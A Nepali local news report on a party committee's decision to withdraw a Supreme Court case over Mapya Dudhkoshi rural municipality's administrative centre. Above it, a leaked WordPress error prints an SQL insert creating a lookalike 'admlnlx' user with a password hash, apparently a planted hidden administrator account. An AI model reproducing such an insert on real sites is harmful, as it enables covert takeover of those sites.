WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BALaCUWE1BAKUWd21zJ2l3rlHYkOIh1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:09:22', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, माप्य दुधकोशी गाउँपालिको केन्द्र सम्बन्धि सर्बोच्च अदालतमा रहेको मुद्धा फिर्ता लिने भएको छ । नेपाल कम्युनिष्ट पार्टि (नेकापा) माप्य दुधकोशी गाउँपालिका गाउँ कमिटिको शुक्रबार र शनिबार बसेको विशेष बैठकले उक्त निणर्य पारित गरेको हो । 
बैठकमा माप्य दुधकोशी गाउँपालिकाको प्रशासनिक केन्द्र (कार्यलय) राजपत्रमा प्रकाश भए अनुरुप खास्ताममा निमार्ण गर्नको लागि गग्गा ब्याबस्थापन गरि भौतिक पुर्वधारको विकासको थालनि गर्ने । केन्द्रको वियमा विबादित भएर अदालति प्रक्रियामा रहेको मुद्धालाई मेलमिलाप गरि मुद्धा फिर्ता निले निर्णय भएको छ । 
बैठकमा नेपाल कम्युनिष्ट पार्टि नेकपा गाउँकमिटि अध्यक्ष गौरब राई, पार्टि नेता तथा माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्धिकिरण राई, प्रदेश नं. १ निर्वाचन क्षेत्रिय समिति सोलुखुम्बु “ख” का सचिव आस कुमार राई (शिशिर) नेकपा जिल्ला सदस्य, गाउँपालिका सदस्य, नेकपा सम्बद्ध स्थानिय वडा सदय, कार्यपालिका सदस्यहरुको उपस्तिथि रहेको थियो ।